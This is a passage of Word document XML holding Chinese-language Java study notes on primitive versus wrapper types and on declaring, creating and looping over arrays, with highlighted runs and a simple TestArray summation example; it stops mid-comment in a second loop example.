    <w:p w14:paraId="6A0DDCA6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>初始值不同：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D6BF19" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>基本类型的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>初始值如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>boolean</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>false</w:t>
      </w:r>
      <w:r>
        <w:t>，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>而包装类型的初始值为</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>null</w:t>
      </w:r>
      <w:r>
        <w:t>；</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="396DE00C" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47390E84" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>使用方式不同：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72EEB5D7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>基本类型直接赋值直接使用就好，而包</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>装类型在集合如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Collection</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>、</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Map</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>时会使用到</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC2FBC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3541F91B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">Java </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>语言中提供的数组是用来存储</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>固定大小</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>同类型元素</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EFE454B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3BB528D6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>有两种方法可以声明数组：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FEC645F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dataType[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arrayRefVar;   // </w:t>
      </w:r>
      <w:r>
        <w:t>首选的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AD3670E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B25560F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dataType</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arrayRefVar</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>[]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">;  // </w:t>
      </w:r>
      <w:r>
        <w:t>效果相同，但不是首选方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22634C5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>注意</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r>
        <w:t>建议使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dataType[] arrayRefVar </w:t>
      </w:r>
      <w:r>
        <w:t>的声明风格声明数组变量。</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> dataType arrayRefVar[] </w:t>
      </w:r>
      <w:r>
        <w:t>风格是来自</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C/C++ </w:t>
      </w:r>
      <w:r>
        <w:t>语言</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>，在</w:t>
      </w:r>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>中采用是为了让</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> C/C++ </w:t>
      </w:r>
      <w:r>
        <w:t>程序员能够快速理解</w:t>
      </w:r>
      <w:r>
        <w:t>java</w:t>
      </w:r>
      <w:r>
        <w:t>语言。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5674D66F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5B5353F0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>Eg:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26C80272" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">double[] myList;         // </w:t>
      </w:r>
      <w:r>
        <w:t>首选的方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6212843D" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:left="420" w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>或</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B67F42B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">double myList[];         //  </w:t>
      </w:r>
      <w:r>
        <w:t>效果相同，但不是首选方法</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E0F17EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="04158DC8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>Java</w:t>
      </w:r>
      <w:r>
        <w:t>语言使用</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>操作符来创建数组</w:t>
      </w:r>
      <w:r>
        <w:t>，语法如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49ECEB5A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="210DB04B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">arrayRefVar = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>new dataType[arraySize]</w:t>
      </w:r>
      <w:r>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2530E37F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>上面的语法语句做了两件事：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F944618" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5651E115" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>一、使用</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>dataType[arraySize]</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>创建了一个数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E34BEB8" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>二、把新创建的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数组的引用</w:t>
      </w:r>
      <w:r>
        <w:t>赋值给变量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> arrayRefVar</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68855562" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>数组变量的声明，和创建数组可以用一条语句完成，如下所示：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2987D0" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A4C1006" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>dataType[] arrayRefVar = new dataType[arraySize];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="530FB1BC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>另外，你还可以使用如下的方式创建数组。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C22675E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6EE45477" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>dataType[] arrayRefVar = {value0, value1, ..., valuek};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488958D5" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>数组的元素是通过索引访问的。</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>数组索引从</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> 0 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>开始</w:t>
      </w:r>
      <w:r>
        <w:t>，所以索引值从</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>到</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>arrayRefVar.length-1</w:t>
      </w:r>
      <w:r>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5821CA1B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="004C452C" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="235348C6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>下面的语句首先声明了一个数组变量</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> myList</w:t>
      </w:r>
      <w:r>
        <w:t>，接着创建了一个包含</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> 10 </w:t>
      </w:r>
      <w:r>
        <w:t>个</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> double </w:t>
      </w:r>
      <w:r>
        <w:t>类型元素的数组，并且把它的引用赋值给</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> myList </w:t>
      </w:r>
      <w:r>
        <w:t>变量。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D1B9B09" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class TestArray {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37179092" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E1204E3" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>数组大小</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345235C2" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>int size = 10;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E51D48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>定义数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00A129C7" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>double[] myList = new double[size];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41CC69DF" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[0] = 5.6;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A065ACA" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[1] = 4.5;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D5E753" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[2] = 3.3;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6918433A" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[3] = 13.2;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62D7ED5F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[4] = 4.0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10BA4588" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[5] = 34.33;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550A3B16" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[6] = 34.0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04899C2E" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[7] = 45.45;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E393461" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[8] = 99.993;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="639B3265" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      myList[9] = 11123;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53E93FA1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>计算所有元素的总和</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363AF5C1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>double total = 0;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EF2C708" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for (int i = 0; i &lt; size; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CA3030" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">         total += myList[i];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71A75057" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AC20E92" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      System.out.println("</w:t>
      </w:r>
      <w:r>
        <w:t>总和为：</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> " + total);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B5BF58" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="747A77AB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="194DE01F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="5"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>遍历数组</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9BC89F" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:pStyle w:val="6"/>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>基本循环</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026C60EB" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t>public class TestArray {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12CED318" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">   public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2384EA48" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      double[] myList = {1.9, 2.9, 3.4, 3.5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1C9D3B" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DC8A871" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
      </w:r>
      <w:r>
        <w:t>打印所有数组元素</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F2BFE1" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>for (int i = 0; i &lt; myList.length; i++) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CB809DC" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">         System.out.println(myList[i] + " ");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B5EFEB6" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      }</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="765E5206" w14:textId="77777777" w:rsidR="004C452C" w:rsidRDefault="00C554AB" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">      // </w:t>
